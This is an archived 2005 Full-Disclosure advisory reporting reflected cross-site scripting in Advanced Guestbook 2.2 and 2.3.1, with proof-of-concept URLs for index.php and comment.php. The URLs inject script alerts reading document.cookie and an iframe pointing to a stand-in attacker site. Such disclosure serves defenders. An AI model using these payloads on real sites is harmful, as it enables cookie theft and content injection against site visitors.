[Full-disclosure] Advanced Guestbook remote XSS exploit

2005-12-26T00:00:00
ID SECURITYVULNS:DOC:10818
Type securityvulns
Reporter Securityvulns
Modified 2005-12-26T00:00:00

Description

Advanced Guestbook 2.2 and 2.3.1 and possibly other versions remote XSS vulnerabilities By: Handrix <handrix_at_morx_org> 16 December 2005 MorX security research team www.morx.org

Description:

Advanced Guestbook is a PHP-based guestbook script.

index.php and comment.php scripts are vulnerable to XSS attacks. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.

Exploit:

http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie);</script> http://www.example.com/guestbook/index.php?entry=<iframe src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script> http://www.example.com/guestbook/comment.php?gb_id=1<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Vulnerable versions :

Advanced Guestbook 2.2 Advanced Guestbook 2.3.1


Nouveau : tйlйphonez moins cher avec Yahoo! Messenger ! Dйcouvez les tarifs exceptionnels pour appeler la France et l'international. Tйlйchargez sur http://fr.messenger.yahoo.com


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/